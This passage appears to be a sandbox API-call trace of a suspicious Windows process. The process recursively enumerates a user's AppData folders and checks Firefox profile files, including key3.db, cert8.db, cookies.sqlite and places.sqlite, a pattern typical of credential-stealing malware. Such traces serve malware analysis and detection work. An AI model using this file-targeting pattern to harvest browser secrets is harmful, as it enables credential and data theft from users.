lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.754] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.754] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x287a68 [0043.754] FindNextFileW (in: hFindFile=0x287a68, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.755] FindNextFileW (in: hFindFile=0x287a68, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.755] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\\\*", lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0x287aa8 [0043.755] FindNextFileW (in: hFindFile=0x287aa8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.755] FindNextFileW (in: hFindFile=0x287aa8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.755] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\\\*", lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0x287e48 [0043.756] FindNextFileW (in: hFindFile=0x287e48, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.756] FindNextFileW (in: hFindFile=0x287e48, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.756] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\\\*", lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 0x287e88 [0043.757] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 1 [0043.760] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 1 [0043.760] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 0 [0043.760] FindClose (in: hFindFile=0x287e88 | out: hFindFile=0x287e88) returned 1 [0043.760] FindNextFileW (in: hFindFile=0x287e48, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0 [0043.760] FindClose (in: hFindFile=0x287e48 | out: hFindFile=0x287e48) returned 1 [0043.760] FindNextFileW (in: hFindFile=0x287aa8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0 [0043.761] FindClose (in: hFindFile=0x287aa8 | out: hFindFile=0x287aa8) returned 1 [0043.761] FindNextFileW (in: hFindFile=0x287a68, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.761] FindClose (in: hFindFile=0x287a68 | out: hFindFile=0x287a68) returned 1 [0043.761] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.761] FindClose (in: hFindFile=0x2897e8 | out: hFindFile=0x2897e8) returned 1 [0043.761] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.761] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.761] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.761] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.761] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288780 [0043.762] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.762] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.762] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\extensions\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897e8 [0043.763] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.763] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.763] FindClose (in: hFindFile=0x2897e8 | out: hFindFile=0x2897e8) returned 1 [0043.763] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.763] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897e8 [0043.764] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.764] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.764] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\crash reports\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x287ae0 [0043.764] FindNextFileW (in: hFindFile=0x287ae0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.764] FindNextFileW (in: hFindFile=0x287ae0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.764] FindNextFileW (in: hFindFile=0x287ae0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.764] FindClose (in: hFindFile=0x287ae0 | out: hFindFile=0x287ae0) returned 1 [0043.764] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.765] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x287ae0 [0043.765] FindNextFileW (in: hFindFile=0x287ae0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.765] FindNextFileW (in: hFindFile=0x287ae0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.765] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\\\*", lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0x287bc8 [0043.777] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.781] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.781] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x889889e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x889889e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x889aeb40, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18)) returned 1 [0043.782] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.782] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\\\*", lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0x287e40 [0043.800] FindNextFileW (in: hFindFile=0x287e40, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.800] FindNextFileW (in: hFindFile=0x287e40, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.800] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), fInfoLevelId=0x0, lpFileInformation=0x12be3c | out: lpFileInformation=0x12be3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2ba9a20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xa2ba9a20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xa2bbab90, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xbdb)) returned 1 [0043.800] FindNextFileW (in: hFindFile=0x287e40, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.801] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json"), fInfoLevelId=0x0, lpFileInformation=0x12be3c | out: lpFileInformation=0x12be3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd150e220, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xd150e220, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xd155a4e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0xbdb)) returned 1 [0043.801] FindNextFileW (in: hFindFile=0x287e40, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0 [0043.801] FindClose (in: hFindFile=0x287e40 | out: hFindFile=0x287e40) returned 1 [0043.801] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.801] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3348a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3348a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0043.802] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.802] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xbe55ec80, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xc2)) returned 1 [0043.802] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.802] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851984e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x851984e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x86704ae0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x38000)) returned 1 [0043.803] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.803] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84f831a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84f831a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0043.804] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.804] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c6aeea0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8c6aeea0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd38df610, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0043.805] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.805] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83553fa0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x83553fa0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x83553fa0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x87)) returned 1 [0043.805] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.805] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e0ad140, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e0ad140, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x83507ce0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x70000)) returned 1 [0043.806] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.806] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport\\\\*", lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0x2981c0 [0043.806] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.806] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0 [0043.806] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.807] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.807] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc1711ed0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc1711ed0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xe9dad5d0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x118000)) returned 1 [0043.808] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.808] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\\\*", lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0x2981c0 [0043.808] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.808] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.808] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\\\*", lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 0x287e60 [0043.809] FindNextFileW (in: hFindFile=0x287e60, lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 1 [0043.809] FindNextFileW (in: hFindFile=0x287e60, lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 1 [0043.809] FindNextFileW (in: hFindFile=0x287e60, lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 1 [0043.809] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\\\*", lpFindFileData=0x12b128 | out: lpFindFileData=0x12b128) returned 0x298a50 [0043.822] FindNextFileW (in: hFindFile=0x298a50, lpFindFileData=0x12b128 | out: lpFindFileData=0x12b128) returned 1 [0043.822] FindNextFileW (in: hFindFile=0x298a50, lpFindFileData=0x12b128 | out: lpFindFileData=0x12b128) returned 1 [0043.823] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\*", lpFindFileData=0x12abc8 | out: lpFindFileData=0x12abc8) returned 0x298a90 [0043.823] FindNextFileW (in: hFindFile=0x298a90, lpFindFileData=0x12abc8 | out: lpFindFileData=0x12abc8) returned 1 [0043.824] FindNextFileW (in: hFindFile=0x298a90, lpFindFileData=0x12abc8 | out: lpFindFileData=0x12abc8) returned 0 [0043.824] FindClose (in: hFindFile=0x298a90 | out: hFindFile=0x298a90) returned 1 [0043.824] FindNextFileW (in: hFindFile=0x298a50, lpFindFileData=0x12b128 | out: lpFindFileData=0x12b128) returned 1 [0043.824] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12b37c | out: lpFileInformation=0x12b37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x881f23c0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x881f23c0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc51450a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x108000)) returned 1 [0043.824] FindNextFileW (in: hFindFile=0x298a50, lpFindFileData=0x12b128 | out: lpFindFileData=0x12b128) returned 0 [0043.824] FindClose (in: hFindFile=0x298a50 | out: hFindFile=0x298a50) returned 1 [0043.825] FindNextFileW (in: hFindFile=0x287e60, lpFindFileData=0x12b688 | out: lpFindFileData=0x12b688) returned 0 [0043.825] FindClose (in: hFindFile=0x287e60 | out: hFindFile=0x287e60) returned 1 [0043.825] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0 [0043.825] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.825] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.825] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3f2f80, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3f2f80, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0043.825] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.826] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.826] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84d21ba0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84d21ba0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc12c0e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x39)) returned 1 [0043.826] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.826] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.826] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\minidumps\\\\*", lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0x2981c0 [0043.827] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.827] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0 [0043.827] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.827] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.827] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.827] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7df7c640, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7df7c640, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd17e1c40, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0043.828] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.828] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x835ec520, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x835ec520, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x739fa5b0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0xa00000)) returned 1 [0043.830] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.830] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb4cc880, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xcb4cc880, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xcb4cc880, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0xe02)) returned 1 [0043.831] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.831] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe7e820, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc06da00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc06da00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, 